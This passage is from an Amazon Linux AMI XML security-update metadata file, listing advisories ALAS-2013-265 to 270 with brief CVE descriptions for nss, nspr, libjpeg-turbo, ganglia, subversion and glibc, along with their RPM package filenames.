arch="x86_64"><filename>Packages/php55-process-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.7-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-265</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-265: important priority package update for nss</title><issued date="2013-12-17 21:31:00" /><updated date="2014-09-16 22:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5607:
An integer overflow flaw was discovered in both NSS and NSPR's implementation of certification parsing on 64-bit systems. A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-5606:
It was discovered that NSS did not reject certificates with incompatible key usage constraints when validating them while the verifyLog feature was enabled. An application using the NSS certificate validation API could accept an invalid certificate.
CVE-2013-5605:
A flaw was found in the way NSS handled invalid handshake packets. A remote attacker could use this flaw to cause a TLS/SSL client using NSS to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1741:
An integer overflow flaw was discovered in both NSS and NSPR's implementation of certification parsing on 64-bit systems. A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-1739:
It was found that the fix for CVE-2013-1620 released via RHSA-2013:1135 introduced a regression causing NSS to read uninitialized data when a decryption failure occurred. A remote attacker could use this flaw to cause a TLS/SSL server using NSS to crash.
CVE-2013-1620:
It was found that the fix for CVE-2013-1620 released via RHSA-2013:1135 introduced a regression causing NSS to read uninitialized data when a decryption failure occurred. A remote attacker could use this flaw to cause a TLS/SSL server using NSS to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1739" title="" id="CVE-2013-1739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1741" title="" id="CVE-2013-1741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5605" title="" id="CVE-2013-5605" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5606" title="" id="CVE-2013-5606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5607" title="" id="CVE-2013-5607" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1829.html" title="" id="RHSA-2013:1829" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.15.3-2.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-266</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-266: important priority package update for nspr</title><issued date="2013-12-17 21:31:00" /><updated date="2014-09-16 22:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5607:
An integer overflow flaw was discovered in both NSS and NSPR's implementation of certification parsing on 64-bit systems. A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-5606:
It was discovered that NSS did not reject certificates with incompatible key usage constraints when validating them while the verifyLog feature was enabled. An application using the NSS certificate validation API could accept an invalid certificate.
CVE-2013-5605:
A flaw was found in the way NSS handled invalid handshake packets. A remote attacker could use this flaw to cause a TLS/SSL client using NSS to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1741:
An integer overflow flaw was discovered in both NSS and NSPR's implementation of certification parsing on 64-bit systems. A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-1739:
It was found that the fix for CVE-2013-1620 released via RHSA-2013:1135 introduced a regression causing NSS to read uninitialized data when a decryption failure occurred. A remote attacker could use this flaw to cause a TLS/SSL server using NSS to crash.
CVE-2013-1620:
It was found that the fix for CVE-2013-1620 released via RHSA-2013:1135 introduced a regression causing NSS to read uninitialized data when a decryption failure occurred. A remote attacker could use this flaw to cause a TLS/SSL server using NSS to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1739" title="" id="CVE-2013-1739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1741" title="" id="CVE-2013-1741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5605" title="" id="CVE-2013-5605" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5606" title="" id="CVE-2013-5606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5607" title="" id="CVE-2013-5607" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1829.html" title="" id="RHSA-2013:1829" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-debuginfo" version="4.10.2" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.10.2-1.19.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.10.2" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.10.2-1.19.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.10.2" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.10.2-1.19.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.10.2-1.19.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.10.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.10.2-1.19.amzn1.i686.rpm</filename></package><package name="nspr" version="4.10.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.10.2-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-267</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-267: medium priority package update for libjpeg-turbo</title><issued date="2013-12-17 21:32:00" /><updated date="2014-09-16 22:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6630:
An uninitialized memory read issue was found in the way libjpeg-turbo decoded images with missing Start Of Scan (SOS) JPEG markers or Define Huffman Table (DHT) JPEG markers. A remote attacker could create a specially crafted JPEG image that, when decoded, could possibly lead to a disclosure of potentially sensitive information.
CVE-2013-6629:
An uninitialized memory read issue was found in the way libjpeg-turbo decoded images with missing Start Of Scan (SOS) JPEG markers or Define Huffman Table (DHT) JPEG markers. A remote attacker could create a specially crafted JPEG image that, when decoded, could possibly lead to a disclosure of potentially sensitive information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6629" title="" id="CVE-2013-6629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6630" title="" id="CVE-2013-6630" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1803.html" title="" id="RHSA-2013:1803" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libjpeg-turbo-static" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-static-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-debuginfo-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-devel-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-devel-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-utils-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="turbojpeg" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-static-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-debuginfo-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-utils-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="turbojpeg" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="turbojpeg-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-devel-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-devel-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-1.2.1-3.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-268</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-268: medium priority package update for ganglia</title><issued date="2013-12-17 21:39:00" /><updated date="2014-09-16 22:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6395:
Cross-site scripting (XSS) vulnerability in header.php in Ganglia Web 3.5.8 and 3.5.10 allows remote attackers to inject arbitrary web script or HTML via the host_regex parameter to the default URI, which is processed by get_context.php.
1034527:
CVE-2013-6395 ganglia: cross-site scripting flaw in the web interface
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6395" title="" id="CVE-2013-6395" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ganglia-gmond" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-devel" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-devel-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-debuginfo" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-debuginfo-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmond-python" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-python-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-web" version="3.5.10" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-web-3.5.10-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmetad" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmetad-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-web" version="3.5.10" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-web-3.5.10-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-gmond-python" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-python-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-gmetad" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmetad-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-gmond" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-devel" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-devel-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-debuginfo" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-debuginfo-3.6.0-3.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-269</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-269: medium priority package update for subversion</title><issued date="2013-12-17 21:39:00" /><updated date="2014-09-16 22:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4558:
The get_parent_resource function in repos.c in mod_dav_svn Apache HTTPD server module in Subversion 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4, when built with assertions enabled and SVNAutoversioning is enabled, allows remote attackers to cause a denial of service (assertion failure and Apache process abort) via a non-canonical URL in a request, as demonstrated using a trailing /.
1033431:
CVE-2013-4558 subversion: mod_dav_svn assertion when handling certain requests with autoversioning enabled
CVE-2013-4505:
The is_this_legal function in mod_dontdothat for Apache Subversion 1.4.0 through 1.7.13 and 1.8.0 through 1.8.4 allows remote attackers to bypass intended access restrictions and possibly cause a denial of service (resource consumption) via a relative URL in a REPORT request.
1033995:
CVE-2013-4505 subversion: mod_dontdothat does not block requests from certain clients
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4505" title="" id="CVE-2013-4505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4558" title="" id="CVE-2013-4558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-devel" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.7.14-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-270</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-270: medium priority package update for glibc</title><issued date="2013-12-17 21:39:00" /><updated date="2014-09-16 22:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4332:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in glibc's memory allocator functions (pvalloc, valloc, and memalign). If an application used such a function, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1914:
It was found that getaddrinfo() did not limit the amount of stack memory used during name resolution. An attacker able to make an application resolve an attacker-controlled hostname or IP address could possibly cause the application to exhaust all stack memory and crash.
CVE-2013-0242:
A flaw was found in the regular expression matching routines that process multibyte character input. If an application utilized the glibc regular expression matching mechanism, an attacker could provide specially-crafted input that, when processed, would cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242" title="" id="CVE-2013-0242" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914" title="" id="CVE-2013-1914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4332" title="" id="CVE-2013-4332" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1605.html" title="" id="RHSA-2013:1605" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.132.45.amzn1" epoch="0" 